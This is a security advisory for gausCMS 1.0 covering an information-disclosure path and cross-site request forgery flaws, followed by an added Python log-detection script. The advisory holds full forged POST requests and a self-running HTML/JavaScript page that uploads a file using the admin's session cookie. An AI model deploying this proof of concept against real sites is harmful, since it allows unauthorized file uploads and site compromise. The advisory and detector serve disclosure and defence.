'''
 __  __  ____          _    _ ____
|  \/  |/ __ \   /\   | |  | |  _ \
| \  / | |  | | /  \  | |  | | |_) |
| |\/| | |  | |/ /\ \ | |  | |  _ <
| |  | | |__| / ____ \| |__| | |_) |
|_|  |_|\____/_/    \_\\____/|____/

http://www.exploit-db.com/moaub-21-gauscms-multiple-vulnerabilities/
'''

Abysssec Inc Public Advisory

Title            : gausCMS Multiple Vulnerabilities
Affected Version : Gaus CMS version 1.0
Discovery        : www.abysssec.com
Vendor           : http://www.gaustudio.com/gausCMS.html
Download Links   : http://sourceforge.net/projects/gauscms/

Description :
===========================================================================================

This version of gausCMS has multiple vulnerabilities:

1- Access to Admin's Login and Information Disclosure
2- CSRF: Upload arbitrary file and rename file

Access to Admin's Section and Information Disclosure:
===========================================================================================

With this path you can easily access the Admin's login:

http://Example.com/admin_includes/template/languages/english/english.txt

Vulnerable Code:

http://Example.com/default.asp
Ln 37:
Set oFile = FSO.GetFile(PATHADMIN & "admin_includes/template/languages/" & GUILanguage & "/" & GUILanguage & ".txt")

CSRF Upload arbitrary file and rename file
===========================================================================================

By sending a POST request to this path you can upload an arbitrary file, of course with the Admin's cookie, by means of a CSRF technique.

http://Example.com/default.asp?dir=&toDo=uploadFile

For example, you can feed this POST request to the Admin:

POST http://Example.com/default.asp?dir=&toDo=uploadFile HTTP/1.1
Host: Example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://Example.com/default.asp?dir=&toDo=uploadFile
Cookie: Skin=default; ASPSESSIONIDQSASTTBS=EIPNNJIAKDDEAGDKACICOBHJ
Content-Type: multipart/form-data; boundary=---------------------------287032381131322
Content-Length: 306

Message Body:

-----------------------------287032381131322
Content-Disposition: form-data; name="attach1"; filename="Test.txt"
Content-Type: text/plain

123
-----------------------------287032381131322
Content-Disposition: form-data; name="toDo"

Upload File
-----------------------------287032381131322--

----------------------------------------------------------------------------------

With the same method we can rename files via the following path:

http://Example.com/default.asp?dir=&file=Test2.txt&toDo=Rename%20File

For example, you can feed this POST request to the Admin:

POST http://Example.com/default.asp?dir=&file=Test.txt&toDo=Rename%20File HTTP/1.1
Host: Example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://Example.com/default.asp?dir=&file=Test2.txt&toDo=rename
Cookie: Skin=default; ASPSESSIONIDQSASTTBS=IIPNNJIANIKOIKGOGOIKAJGE
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

Message Body:

newFileName=Test2.txt&toDo=Rename+File

The Source of HTML Page (Malicious Link) for Upload Arbitrary file
===========================================================================================

With this page, we send a POST request with AJAX to upload a file with the Admin's cookie.

<html>
<head>
<title>Welcome to gausCMS!</title>
Hello!
...
...
...
This page uploads a file
<script>
// Shared between FileUpload() and done(); declared at script scope so the
// readyState callback can see the request object.
var http = false;
var binary;
var filename;

function FileUpload() {
    try {
        netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");
    } catch (e) {
    }
    if (window.XMLHttpRequest) {
        http = new XMLHttpRequest();
    } else if (window.ActiveXObject) {
        http = new ActiveXObject("Microsoft.XMLHTTP");
    }
    var url = "http://Example.com/default.asp?dir=&toDo=uploadFile";
    var filename = 'Test.txt';
    var filetext = ' 123 ';
    var boundaryString = '---------------------------287032381131322';
    var boundary = '--' + boundaryString;
    // Multipart body laid out like the POST request above: CRLF line ends,
    // each part introduced by the boundary, closing boundary followed by "--".
    var requestbody = boundary + '\r\n' +
        'Content-Disposition: form-data; name="attach1"; filename="' + filename + '"' + '\r\n' +
        'Content-Type: text/plain' + '\r\n' +
        '\r\n' +
        filetext + '\r\n' +
        boundary + '\r\n' +
        'Content-Disposition: form-data; name="toDo"' + '\r\n' +
        '\r\n' +
        'Upload File' + '\r\n' +
        boundary + '--' + '\r\n';
    http.onreadystatechange = done;
    http.open('POST', url, true);
    http.setRequestHeader("Content-type", "multipart/form-data; boundary=" + boundaryString);
    // Browsers set Connection and Content-length themselves; these two calls are ignored.
    http.setRequestHeader("Connection", "close");
    http.setRequestHeader("Content-length", requestbody.length);
    http.send(requestbody);
}

function done() {
    if (http.readyState == 4 && http.status == 200) {
        //alert(http.responseText);
        //alert('Upload OK');
    }
}
</script>
</head>
<body onload="FileUpload();">
</body>
</html>

===========================================================================================
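As an added detection example (written for this page, not part of the Abysssec advisory or of gausCMS), the following Python flags the two CSRF-reachable actions the advisory shows (toDo=uploadFile and toDo=Rename File on default.asp) in IIS W3C extended logs whenever the request is a POST whose Referer is missing or belongs to another host. The log lines, host names and the site name are constructed for the example; the field names are the standard W3C ones.

```python
# Added example: spot CSRF-shaped gausCMS upload/rename requests in IIS W3C logs.
from urllib.parse import parse_qs, unquote_plus, urlsplit

# toDo values from the advisory that change server state (compared lower-case).
CSRF_SENSITIVE_ACTIONS = {"uploadfile", "rename file"}

# Constructed sample log (not real traffic): a normal page load, a legitimate
# same-origin upload, a cross-origin upload and a rename with no Referer.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs(Referer) sc-status
2010-09-21 10:00:01 GET /default.asp dir=&toDo=uploadFile 10.0.0.5 http://Example.com/default.asp 200
2010-09-21 10:00:09 POST /default.asp dir=&toDo=uploadFile 10.0.0.5 http://Example.com/default.asp?dir=&toDo=uploadFile 200
2010-09-21 10:02:33 POST /default.asp dir=&toDo=uploadFile 10.0.0.5 http://other-site.example/upload.html 200
2010-09-21 10:02:40 POST /default.asp dir=&file=Test.txt&toDo=Rename%20File 10.0.0.5 - 200
"""

def parse_w3c(log_text):
    """Yield one dict per request line, keyed by the names from the #Fields: header."""
    fields = None
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields:
            yield dict(zip(fields, line.split()))

def is_suspicious(rec, site_host):
    """POST to default.asp with a sensitive toDo action and an absent or foreign Referer."""
    if rec.get("cs-method") != "POST" or not rec.get("cs-uri-stem", "").lower().endswith("/default.asp"):
        return False
    query = parse_qs(rec.get("cs-uri-query", ""), keep_blank_values=True)
    actions = {unquote_plus(v).lower() for v in query.get("toDo", [])}
    if not actions & CSRF_SENSITIVE_ACTIONS:
        return False
    referer = rec.get("cs(Referer)", "-")
    if referer == "-":
        return True                       # IIS logs "-" when no Referer was sent
    host = urlsplit(referer).hostname
    return host is None or host.lower() != site_host.lower()

def find_csrf_candidates(log_text, site_host):
    """Return the log records that match is_suspicious for the given site host."""
    return [rec for rec in parse_w3c(log_text) if is_suspicious(rec, site_host)]

if __name__ == "__main__":
    for rec in find_csrf_candidates(SAMPLE_LOG, "Example.com"):
        print(rec["time"], rec["c-ip"], rec["cs-uri-query"], "Referer:", rec["cs(Referer)"])
```

A same-origin Referer alone is not a proof of legitimacy (some clients strip it), so treat hits as triage leads; the real fix is a per-session anti-CSRF token checked by default.asp before any toDo action runs.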